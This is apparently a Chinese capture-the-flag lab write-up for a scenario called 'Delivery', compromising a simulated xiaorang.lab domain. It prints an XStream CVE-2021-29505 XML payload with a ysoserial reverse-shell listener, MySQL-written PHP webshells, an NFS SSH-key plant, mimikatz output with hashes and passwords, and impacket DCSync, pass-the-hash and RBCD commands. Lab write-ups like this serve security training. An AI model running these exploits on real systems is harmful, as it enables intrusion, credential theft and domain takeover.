Delivery
涉及的知识点
XStream RCE(CVE-2021-29505)
NFS利用
ftp的suid提权
mysql写webshell
ACL ADMIN组writeDacl特权利用(DCSync或RBCD)flag1
扫,扫到匿名ftp
start infoscan
39.99.154.229:80 open
39.99.154.229:22 open
39.99.154.229:21 open
39.99.154.229:8080 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle http://39.99.154.229 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works
[*] WebTitle http://39.99.154.229:8080 code:200 len:3655 title:公司发货单
[+] ftp 39.99.154.229:21:anonymous
[->]1.txt
[->]pom.xmlXStream RCE(CVE-2021-29505)
有pom.xml,看到xstream版本是1.4.16,并且有CC依赖,可以打CVE-2021-29505
使用 ysoseria l的 JRMPListener 启动一个恶意的 RMI Registry 监听,收到请求后会返回用 CC6 利用链构造的恶意序列化对象
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections6 "bash -c {echo,Ym...MQ==}|{base64,-d}|{bash,-i}"然后向服务器发送XML POC
POST /just_sumbit_it HTTP/1.1
Host: 39.99.154.229:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: application/xml
Content-Length: 3169
<java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
</default>
<int>3</int>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>12345</type>
<value class='com.sun.org.apache.xpath.internal.objects.XString'>
<m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>12345</type>
<value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
<message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
<parsedMessage>true</parsedMessage>
<soapVersion>SOAP_11</soapVersion>
<bodyParts/>
<sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
<attachmentsInitialized>false</attachmentsInitialized>
<nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
<aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
<candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
<names>
<string>aa</string>
<string>aa</string>
</names>
<ctx>
<environment/>
<registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
<java.rmi.server.RemoteObject>
<string>UnicastRef</string>
<string>vpsip</string>
<int>1099</int>
<long>0</long>
<int>0</int>
<long>0</long>
<short>0</short>
<boolean>false</boolean>
</java.rmi.server.RemoteObject>
</registry>
<host>vpsip</host>
<port>1099</port>
</ctx>
</candidates>
</aliases>
</nullIter>
</sm>
</message>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
</java.util.PriorityQueue>
</java.util.PriorityQueue>
flag{7550a6e1-f104-4623-9e22-635ad8ef9500}flag2
传fscan、gost
start infoscan
(icmp) Target 172.22.13.14 is alive
(icmp) Target 172.22.13.28 is alive
(icmp) Target 172.22.13.6 is alive
(icmp) Target 172.22.13.57 is alive
[*] Icmp alive hosts len is: 4
172.22.13.6:88 open
172.22.13.14:8080 open
172.22.13.28:8000 open
172.22.13.28:3306 open
172.22.13.6:445 open
172.22.13.28:445 open
172.22.13.6:139 open
172.22.13.28:139 open
172.22.13.6:135 open
172.22.13.28:135 open
172.22.13.57:80 open
172.22.13.57:22 open
172.22.13.14:80 open
172.22.13.14:22 open
172.22.13.14:21 open
172.22.13.28:80 open
[*] alive ports len is: 16
start vulscan
[*] NetInfo
[*]172.22.13.28
[->]WIN-HAUWOLAO
[->]172.22.13.28
[*] WebTitle http://172.22.13.28 code:200 len:2525 title:欢迎登录OA办公平台
[*] NetInfo
[*]172.22.13.6
[->]WIN-DC
[->]172.22.13.6
[*] WebTitle http://172.22.13.57 code:200 len:4833 title:Welcome to CentOS
[*] NetBios 172.22.13.6 [+] DC:XIAORANG\WIN-DC
[*] WebTitle http://172.22.13.14:8080 code:200 len:3655 title:公司发货单
[*] WebTitle http://172.22.13.14 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works
[*] NetBios 172.22.13.28 WIN-HAUWOLAO.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] WebTitle http://172.22.13.28:8000 code:200 len:170 title:Nothing Here.
[+] ftp 172.22.13.14:21:anonymous
[->]1.txt
[->]pom.xml
[+] mysql 172.22.13.28:3306:root 123456
已完成 16/16
[*] 扫描结束,耗时: 17.4844434sNFS利用
根据第二关关卡剧情提示,有台主机存在NFS服务
查询远程过程调用(RPC)服务信息
proxychains4 -q rpcinfo -p 172.22.13.57
列出NFS服务器上的共享信息
proxychains4 -q showmount -e 172.22.13.57
接着到入口机那里,安装一下nfs
apt-get update
apt-get install nfs-common -y将/home/joyce挂载到本地
mkdir simho
mount -t nfs 172.22.13.57:/home/joyce ./simho写SSH公钥登录
cd simho
mkdir .ssh
ssh-keygen -t rsa -b 4096
cat /root/.ssh/id_rsa.pub >> /tmp/simho/.ssh/authorized_keys
ssh joyce@172.22.13.57
ftp的suid提权
第二个flag在根目录下,但是joyce用户没有读的权限,查询suid文件发现有ftp
先在入口机开启ftp服务:
python3 -m pyftpdlib -p 9999 -u simho -P simho -w &然后centos这台机连接ftp
ftp 172.22.13.14 9999连接后用put命令将flag02.txt上传到入口机
flag{1e4b7acc-13a9-4234-a59a-8d9889dbd6cd}flag3
mysql写webshell
第三关剧情还没利用到域,先看扫到的mysql弱密码
show variables like "secure_file_priv";secure_file_priv不为NULL,可以写文件
再看到data绝对路径是在phpstudy里的,可以直接在WWW写webshell
show variables like "%datadir%"
可以直接用into outfile写webshell
select "<?php eval($_POST[1]);?>" into outfile "C:/phpstudy_pro/WWW/1.php";或者利用日志记录写webshell
查询日志保存状态和日志保存路径
show variables like '%general%';查看是否开启了secure保护
show variables like '%secure%';开启日志并修改日志保存路径
set global general_log='On';
set global general_log_file='C:/phpstudy_pro/WWW/2.php';在日志文件中写入webshell
select '<?php eval($_POST[1]);?>';蚁剑连接是system权限,添加管理员账户上去拿第三个flag
flag{fa1f1c2a-d670-4e55-a0dc-ca65d6906228} flag4
前面centos根目录还有个pAss.txt ,得到一组域用户账密
[joyce@centos ~]$ cat /pAss.txt
xiaorang.lab/zhangwen\QT62f3gBhK1RDP登录前面扫到的172.22.13.28这台主机
zhangwen@xiaorang.lab/QT62f3gBhK1bloodhound域信息收集
writeDacl特权利用
看到CHANGLEI用户是在ACL ADMIN组的,并且有WriteDacl权限,可以打DCSync或RBCD
mimikatz能收集到chenglei用户的htlm和明文密码
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > 1.txt
......
User Name : chenglei
Domain : XIAORANG
Logon Server : WIN-DC
Logon Time : 2025/3/12 22:37:08
SID : S-1-5-21-3269458654-3569381900-10559451-1105
msv :
[00000003] Primary
* Username : chenglei
* Domain : XIAORANG
* NTLM : 0c00801c30594a1b8eaa889d237c5382
* SHA1 : e8848f8a454e08957ec9814b9709129b7101fad7
* DPAPI : 89b179dc738db098372c365602b7b0f4
tspkg :
wdigest :
* Username : chenglei
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : chenglei
* Domain : XIAORANG.LAB
* Password : Xt61f3LBhg1
......chenglei/0c00801c30594a1b8eaa889d237c5382/Xt61f3LBhg1DCSync
利用dacledit.py给changlei用户添加 DCSync 权限:
proxychains4 -q python3 dacledit.py xiaorang.lab/chenglei:'Xt61f3LBhg1' -action write -rights DCSync -principal chenglei -target-dn 'DC=xiaorang,DC=lab' -dc-ip 172.22.13.6
从域控导出administrator哈希
proxychains4 -q impacket-secretsdump xiaorang.lab/chenglei:Xt61f3LBhg1@172.22.13.28 -target-ip 172.22.13.6 -just-dc-ntlm
PTH到域控拿最后一个flag
proxychains4 -q impacket-smbexec -hashes :6341235defdaed66fb7b682665752c9a administrator@172.22.13.6 -codec gbk
RBCD
创建受控计算机账户,后续通过该账户配置委派权限
proxychains4 -q impacket-addcomputer "xiaorang.lab/chenglei" -hashes :0c00801c30594a1b8eaa889d237c5382 -computer-name 'simho$' -computer-pass 'whoami@123' -dc-ip 172.22.13.6配置 RBCD 委派关系,允许 simho$ 模拟 WIN-DC$ 上的任意用户(如域管理员),从而获取高权限票据
proxychains4 -q impacket-rbcd "xiaorang.lab/chenglei" -hashes :0c00801c30594a1b8eaa889d237c5382 -action write -delegate-from "simho$" -delegate-to "WIN-DC$" -dc-ip 172.22.13.6使用 impacket-getST 通过 S4U2Self 和 S4U2Proxy 协议,以 simho$ 的身份请求 Administrator 用户的 Kerberos 服务票据(TGS)
proxychains4 -q impacket-getST xiaorang.lab/simho$:'whoami@123' -dc-ip 172.22.13.6 -spn ldap/WIN-DC.xiaorang.lab -impersonate Administrator
设置 Kerberos 票据缓存
export KRB5CCNAME=Administrator.ccache利用票据横向移动到域控,拿最后一个flag
proxychains4 -q impacket-psexec 'xiaorang.lab/administrator@WIN-DC.xiaorang.lab' -target-ip 172.22.13.6 -codec gbk -no-pass -k这里不改/etc/hosts貌似也能连
flag{b9436658-3b0c-4dfc-b0d4-138fe1108466}